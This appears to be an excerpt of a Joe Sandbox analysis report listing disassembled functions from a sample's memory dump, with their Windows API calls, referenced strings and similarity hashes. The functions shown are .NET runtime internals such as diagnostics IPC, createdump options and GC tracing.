Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: FreeHeap$ErrorLast$FileModuleName
String ID: %s$ --diag$ --name $--full$--normal$--triage$--withheap$createdump.exe
API String ID: 3203759797-1772839692
Opcode ID: cd778fc9e7e30315508805bb163031bfc7eeb81141755154d92b242b6bd77c60
Instruction ID: 3891e71b83c1cf52f007affcb95decd21c5cc5e30f5aec4874b472f5fc30ff44
Opcode Fuzzy Hash: cd778fc9e7e30315508805bb163031bfc7eeb81141755154d92b242b6bd77c60
Instruction Fuzzy Hash: CEC18F71E00A288BDB65DF14CC417DDB7B1EB89310F0482E9DD4AA7282D7389E92CF94

Function 00A35530 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 341memoryCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?,?,?,00A31E0D), ref: 00A35586
GetProcessHeap.KERNEL32 ref: 00A35623
HeapAlloc.KERNEL32(03400000,00000000,00000008), ref: 00A35640
GetProcessHeap.KERNEL32 ref: 00A3572F
HeapAlloc.KERNEL32(03400000,00000000,00000008), ref: 00A3574C

Strings

Failed to send DiagnosticsIPC response, xrefs: 00A355C1
Received unknown request type (%d), xrefs: 00A358A0

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: Heap$AllocProcess$Event
String ID: Failed to send DiagnosticsIPC response$Received unknown request type (%d)
API String ID: 952205525-3162944085
Opcode ID: baa0ff6eed97febcff44ed5e84e184f3843e5a200a8a25dd78f7821ffad41e40
Instruction ID: 54662f8d93ff08d3d4e90491af03c9d089b99e0ee72e8bc6bf6cfa6c5199fe59
Opcode Fuzzy Hash: baa0ff6eed97febcff44ed5e84e184f3843e5a200a8a25dd78f7821ffad41e40
Instruction Fuzzy Hash: B7A13771F416109BDB10AB7DF8527AEB3A5EF86311F44426AF908CB381EF3598058BE1

Function 00981240 Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 334memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(00000000,?,?), ref: 009814F6
GetLastError.KERNEL32(00000008,?), ref: 009816EE
FreeLibrary.KERNEL32(00000000), ref: 00981729
HeapFree.KERNEL32(00000000,?), ref: 00981800

Strings

DllGetClassObject, xrefs: 0098173E

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: Free$Heap$ErrorLastLibrary
String ID: DllGetClassObject
API String ID: 4070658762-1075368562
Opcode ID: 2e7908db6845f955fdbf18d80c4ef11157c77675cc3e4799496d67bf9729e7c5
Instruction ID: 8a18d099577c48f60a2881bd6c3da2ef73355703a33693b12d81c2d0eebca0fc
Opcode Fuzzy Hash: 2e7908db6845f955fdbf18d80c4ef11157c77675cc3e4799496d67bf9729e7c5
Instruction Fuzzy Hash: EEE17C75D012299BDB31EF68DD887ADB7B9AF84310F1442D9D809A7390D7789E85CF80

Function 00835C00 Relevance: 16.0, APIs: 4, Strings: 5, Instructions: 222memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000001,00000000,?,00000000,00000000,00000000,00000001), ref: 00835F6F

Part of subcall function 00974900: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,00C7A98C,?,0088D4DA), ref: 00974950

GetCommandLineW.KERNEL32 ref: 00835C88
wcsncmp.API-MS-WIN-CRT-STRING-L1-1-0(03400FF8,?,?), ref: 00835CA7
HeapFree.KERNEL32(00000000,?), ref: 00835E13

Strings

GCGenAnalysisTimeUSec, xrefs: 00835CD8
GCGenAnalysisGen, xrefs: 00835CB8
gcgenaware.{pid}.nettrace, xrefs: 00835E57
GCGenAnalysisBytes, xrefs: 00835CCA
GCGenAnalysisTimeMSec, xrefs: 00835CE6

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: FreeHeap$CommandLinewcsncmp
String ID: GCGenAnalysisBytes$GCGenAnalysisGen$GCGenAnalysisTimeMSec$GCGenAnalysisTimeUSec$gcgenaware.{pid}.nettrace
API String ID: 894456492-1061429456
Opcode ID: bf878a642842bf7bff21d61df74fb12c6d48160f8e715315f61e7f5d80b52b29
Instruction ID: c6c6f04f0c1a5eea0912b841a77c1c5ae54960ca0cd6eac4dcfa3190dd7b528a
Opcode Fuzzy Hash: bf878a642842bf7bff21d61df74fb12c6d48160f8e715315f61e7f5d80b52b29
Instruction Fuzzy Hash: 1B91F270A00348DFDB24DF68EC4979ABBB5FBC5300F40466AE909D7392DBB44A45CBA1

Function 009963F0 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 129synchronizationthreadCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?,0099C8D1,?,?,?,03446270), ref: 009964A0
WaitForSingleObject.KERNEL32(?,00000000,?,0099C8D1,?,?,?,03446270), ref: 009964DF
GetCurrentThreadId.KERNEL32 ref: 00996508
ResetEvent.KERNEL32(?,?,0099C8D1,?,?,?,03446270), ref: 0099651D
SetEvent.KERNEL32(?,?,0099C8D1,?,?,?,03446270), ref: 0099659B

Strings

D::SSCIPCE: done doing helper thread duty. Current helper thread id=0x%x, xrefs: 00996577
D::TART: Trapping all Runtime threads., xrefs: 00996463
D::TART: Skipping for shutdown., xrefs: 0099642E
D::SSCIPCE: Calling IsRCThreadReady(), xrefs: 009964B9

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: Event$CurrentObjectResetSingleThreadWait
String ID: D::SSCIPCE: Calling IsRCThreadReady()$D::SSCIPCE: done doing helper thread duty. Current helper thread id=0x%x$D::TART: Skipping for shutdown.$D::TART: Trapping all Runtime threads.
API String ID: 976909831-2666063001
Opcode ID: b15a9bc06bc995038b2c32ffae8fd46f4495de1a2116413da63aec56dabebe1b
Instruction ID: ff6bab2a0350fcfb368e008b477a1bf4ce8f4c860bb65b91277696eae1832834
Opcode Fuzzy Hash: b15a9bc06bc995038b2c32ffae8fd46f4495de1a2116413da63aec56dabebe1b
Instruction Fuzzy Hash: F541A5757042409FEF20AB68D889B667BA5EF95704F054098FD458B3E3EB75DC80C761

Function 007B1910 Relevance: 15.3, APIs: 9, Strings: 1, Instructions: 267memorystringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,BBFE6088,?,00000000,00000000), ref: 007B1947
HeapFree.KERNEL32(00000000,?), ref: 007B19D3
HeapFree.KERNEL32(00000000,?), ref: 007B1A11
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000000,00000000,00000000), ref: 007B1A4D
HeapFree.KERNEL32(00000000,?), ref: 007B1AAF
HeapFree.KERNEL32(00000000,?,BBFE6088,00000000,?,00000000), ref: 007B1BD8
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,?,BBFE6088,00000000,?,00000000), ref: 007B1C52
HeapFree.KERNEL32(00000000,?,?,00000000,?,BBFE6088,00000000,?,00000000), ref: 007B1C81

Strings

Arg_InvalidUTF8String, xrefs: 007B1ADE, 007B1CB5

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: FreeHeap$ByteCharMultiWide$strlen
String ID: Arg_InvalidUTF8String
API String ID: 1299763742-2433089184
Opcode ID: 6cf48f12ac6f9805b883573b3d0d54df5dcc4285dce960ef4dbff5a8e7040ec5
Instruction ID: 4e02e46c3f64e9b2cddfde5304a6c44622eade345d2320016eaf00d0a5921608
Opcode Fuzzy Hash: 6cf48f12ac6f9805b883573b3d0d54df5dcc4285dce960ef4dbff5a8e7040ec5
Instruction Fuzzy Hash: 1BA1B770A40218DBEB209F55DC99BEEB7B5FB44740F9042A9E409E7391DB786E408F94

Function 0088C600 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 278memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(00000000,?), ref: 0088CAD4

Part of subcall function 0097D970: HeapFree.KERNEL32(00000000,?,?,?,BBFE6088,00000000), ref: 0097DAC8

Part of subcall function 0097F100: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(000001FF,00000003,00000000,00000002,00000002,?,00000002,?,0097F2D7,00000002,?), ref: 0097F174
Part of subcall function 0097F100: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?), ref: 0097F1A4
Part of subcall function 0097F100: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0097F1AF
Part of subcall function 0097F100: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0097F1BA
Part of subcall function 0097F100: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0097F1C5

GetCurrentProcessId.KERNEL32(000000A8,00D0B884,00000002), ref: 0088C8A9
HeapFree.KERNEL32(00000000,?), ref: 0088C8E0
HeapFree.KERNEL32(00000000,?), ref: 0088C906

Part of subcall function 007265B0: EventWriteTransfer.ADVAPI32(00DA3158,00000033,00C6AB40,00000000,00000000,80131506,00000000,?,?,?,0076B2ED,0000000A,00000006,?,80131506,00000000), ref: 007265EF

HeapFree.KERNEL32(00000000,?), ref: 0088CA49
HeapFree.KERNEL32(00000000,?), ref: 0088CA85
HeapFree.KERNEL32(00000000,?), ref: 0088CAAB

Strings

NULL, xrefs: 0088C9E3

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: FreeHeap$_errno$CurrentEventProcessTransferWrite
String ID: NULL
API String ID: 3531716392-324932091
Opcode ID: e370f612b7b961323a9b30fc035ec2bfec3fedb4198fe980435aace698b829c0
Instruction ID: fe2dd34c4c30682467563d76e5bc792aef1371ffa37b66289513e017f4db7833
Opcode Fuzzy Hash: e370f612b7b961323a9b30fc035ec2bfec3fedb4198fe980435aace698b829c0
Instruction Fuzzy Hash: 38D169B0A05268CAEB24DF24CC48B9DBBF4FF45304F1081D9E949A7291DB755E88CFA5

Function 00A35100 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 194COMMON

Download Yara Rule

APIs

Part of subcall function 00A30940: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000018,?,00000000,?,00A35118,?,00000000,?,?,?,?,?,00A355E7), ref: 00A30945
Part of subcall function 00A30940: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,00A355E7,?,?,?,00A31E0D), ref: 00A30993

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000006,00A34610,?,?,?,?,?,00A355E7,?,?,?,00A31E0D), ref: 00A3516E

Part of subcall function 00A35EB0: WriteFile.KERNEL32(?,?,?,00000000,00000004,00000000,00000000,00000001,?), ref: 00A35ED5
Part of subcall function 00A35EB0: GetLastError.KERNEL32 ref: 00A35EE4
Part of subcall function 00A35EB0: GetOverlappedResult.KERNEL32(?,00000004,00000000,00000001), ref: 00A35EFE

GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,?,00A355E7,?,?,?,00A31E0D), ref: 00A351AB
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,00A355E7,?,?,?,00A31E0D), ref: 00A351EA
FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,00A355E7,?,?,?,00A31E0D), ref: 00A35262
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000006,00A34610,?,?,?,?,?,00A355E7,?,?,?,00A31E0D), ref: 00A352FD
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000006,00A34610,?,?,?,?,?,00A355E7,?,?,?,00A31E0D), ref: 00A35320

Strings

Failed to send DiagnosticsIPC response, xrefs: 00A35149
DOTNET_IPC_V1, xrefs: 00A352B6

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: free$EnvironmentStringsmalloc$ErrorFileFreeLastOverlappedResultWrite
String ID: DOTNET_IPC_V1$Failed to send DiagnosticsIPC response
API String ID: 3916477055-2167823670
Opcode ID: b1a2abdeac5b6a02f260e66935bdfb16ab23d9ddf2b5486fa6706fe900ff55c0
Instruction ID: 7e87bee0473544ebe9b1ad05deaf8224b6951e4efa8a6f1048d224c36dabe23b
Opcode Fuzzy Hash: b1a2abdeac5b6a02f260e66935bdfb16ab23d9ddf2b5486fa6706fe900ff55c0
Instruction Fuzzy Hash: E361C475E006019BCB10AFA8D951BAFB7B5EF88740F094168EC46AB351DB71ED41CBD0

Function 0088D1F0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 170memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00974900: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,00C7A98C,?,0088D4DA), ref: 00974950

HeapFree.KERNEL32(00000000,00000000,BBFE6088,00000001,00DA46E8), ref: 0088D292
wcstok_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00D00BF0,00000001,BBFE6088), ref: 0088D315
wcstok_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00D0B888,?), ref: 0088D330
wcstok_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00D0B888,?), ref: 0088D346
_swprintf.LIBCMT ref: 0088D3A1
wcstok_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00D00BF0,?,?,00000000,00000000,00000000,000000FF), ref: 0088D3CE
HeapFree.KERNEL32(00000000,00000000), ref: 0088D3FC

Strings

{%08x-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}, xrefs: 0088D399

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: wcstok_s$FreeHeap$_swprintf
String ID: {%08x-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}
API String ID: 4021065324-128308884
Opcode ID: ec4fc1742865fe52befcba22d37bf15afc8c2922b69bcbc88e09e7732039df73
Instruction ID: 37508ed19dc77b8f5dc1bcfd4839f677b00ee7e8d14d69204aa3c5d4bdf726e8
Opcode Fuzzy Hash: ec4fc1742865fe52befcba22d37bf15afc8c2922b69bcbc88e09e7732039df73
Instruction Fuzzy Hash: 5C616D71D00398AEDB20DBE5DC09BAEBBB8FB04704F044125E915EB2D5E7B89A08CB51

Function 00983790 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 77COMMON

Download Yara Rule

APIs

wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000104,gcgenaware.{pid}.nettrace,00000000,00000000,00000001), ref: 009837C7
GetCurrentProcessId.KERNEL32 ref: 009837D0
_itow_s.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,?,00000014,0000000A), ref: 009837DF
wcscat_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000104,?), ref: 009837EF
wcscat_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000104,?), ref: 00983802
wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000104,gcgenaware.{pid}.nettrace,gcgenaware.{pid}.nettrace,00000000,00000001), ref: 0098383A

Strings

{pid}, xrefs: 009837A7
gcgenaware.{pid}.nettrace, xrefs: 009837AC, 009837C0, 00983832, 00983833

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: wcscat_swcsncpy_s$CurrentProcess_itow_s
String ID: gcgenaware.{pid}.nettrace${pid}
API String ID: 1046258036-1878681484
Opcode ID: 96d0b122c936e21cf6b2fefbd0f9451e6e5dcfaa3aa3842bc57ed8a363036684
Instruction ID: b59f1db1169b9ed343bb9200045bba21963219174c9d50634eed10f8dce3ce77
Opcode Fuzzy Hash: 96d0b122c936e21cf6b2fefbd0f9451e6e5dcfaa3aa3842bc57ed8a363036684
Instruction Fuzzy Hash: DF110AB16002087BC614ABB9EC8AFEE776DEF85711F404529FA0397281D9B19A15C7B1

Function 00A27620 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 75stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0({pid},00000000,00000000,00A286AC,?), ref: 00A2764A
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00A27658
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00A27666
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00A2767C
_swprintf.LIBCMT ref: 00A276B1
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00A276C0

Strings

{pid}, xrefs: 00A27631, 00A27645
%.*s%s%s, xrefs: 00A276AA

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: strlen$_swprintffreemalloc
String ID: %.*s%s%s${pid}
API String ID: 2542842151-1498274739
Opcode ID: 4ed4fbf5a6466dfc01784123afea4dd0f307baa5658dced3b6cc75dbbb9e52b3
Instruction ID: 6a3c273a5ed329d66b2ffbd1b175fd5b4ff13e8c840eb63499620a0729dcf076
Opcode Fuzzy Hash: 4ed4fbf5a6466dfc01784123afea4dd0f307baa5658dced3b6cc75dbbb9e52b3
Instruction Fuzzy Hash: CC11B7B1A00205AFDB10DF6DFC49AAEBBE8EF44351B140039FC45D3300EA759E61C6A5

Function 007EA520 Relevance: 14.0, APIs: 5, Strings: 4, Instructions: 483memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(00000000,?,?,?,00000407,00000000,?), ref: 007EAC5D

Strings

..., xrefs: 007EA905
VALUETYPE, xrefs: 007EA642
(null), xrefs: 007EA5A5
(dynamicClass), xrefs: 007EAAF5

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: FreeHeap
String ID: (dynamicClass)$(null)$...$VALUETYPE
API String ID: 3298025750-1208169921
Opcode ID: 3ab90b77bedddf687d154dbd727a4ce9161d92a96e05db8a7bae08aad69ea626
Instruction ID: 72daa5ea232c9be8b0405253d928ee43587a8ea8a4fc1193b2b368b2036e7c7a
